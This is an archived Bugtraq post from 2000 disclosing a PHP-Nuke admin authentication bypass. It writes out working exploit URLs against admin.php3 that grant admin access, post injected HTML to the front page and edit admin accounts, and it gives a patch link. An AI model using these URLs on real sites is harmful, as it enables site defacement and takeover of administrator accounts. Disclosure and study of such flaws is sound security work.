[16392] in bugtraq
php-nuke.txt by Starman_Jones
daemon@ATHENA.MIT.EDU (ddd ddd)
Fri Aug 25 15:18:22 2000
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_1acf_58ae_155c"
Message-Id: <F184pLkTgbLYluLCTao000001d1@hotmail.com>
Date: Wed, 23 Aug 2000 22:07:38 GMT
Reply-To: ddd ddd <starman_jones1@HOTMAIL.COM>
From: ddd ddd <starman_jones1@HOTMAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_1acf_58ae_155c
Content-Type: text/plain; format=flowed
Attached is a text i wrote on the php-nuke vulnerability.
The reason why i am releasing this is because i saw a .c program on
packetstorm.securify.com today. I originally planned to keep this private
for one more week to give sites time to update, but there is no point in
waiting since the exploit is out now.
Please excuse the spelling mistakes,
peace,
Starman_Jones
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
Share information about yourself, create your own public profile at
http://profiles.msn.com.
------=_NextPart_000_1acf_58ae_155c
Content-Type: text/plain; name="php-nuke.txt"; format=flowed
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="php-nuke.txt"
php-nuke bug by Starman_Jones 22/08/00
Disclaimer: I am not responsible for whatever you do with the knowledge
you get from reading this advisorie. I am not telling you to go and post
messages on sites that use PHP-nuke.
Recently there was an advisory on bugtraq about An access validation error
that exists in PHP-nuke Web Portal System. With this bug it is possible
for a remote user to gain administrative privileges.
http://www.target.com/admin.php3?admin=anything
The above example lets you login as the administrator. But you cannot do
anything with that url alone. When you click on anything in the
administrator's control panel you get asked for a username and password.
I have found a way to bypass this.
http://www.example.com/admin.php3?admin=anything&op=PostAdminStory&introtext=evil%20hacker%20message
The Above example lets you post a topic on the main page as an
administrator. You can add html tags to it. And a topic.
To seperate the text you want to display you use '%20' without the ''.
You could also put html in the message and make the whole front page
redirect to some other page. Anyway you get the idea.
You can also edit the existing admin accounts by doing:
http://www.example.com/admin.php3?admin=anything&op=mod_authors
With &op= whatever is in teh administration menu you can control
everything that it lets you. I will not go into anything else. I just
wanted to show you how to post as an administrator and leave the rest up
to you.
The patch for this bug is available at:
http://www.ncc.org.we/php-nuke.php3?op=download&location=http://download.sourceforge.net/phpnuke&file=PHP-Nuke-3.0.tar.gz
You can post this text on any page as long as you give proper credit to
me: Starman_Jones.
Copyright Starman_Jones
------=_NextPart_000_1acf_58ae_155c--
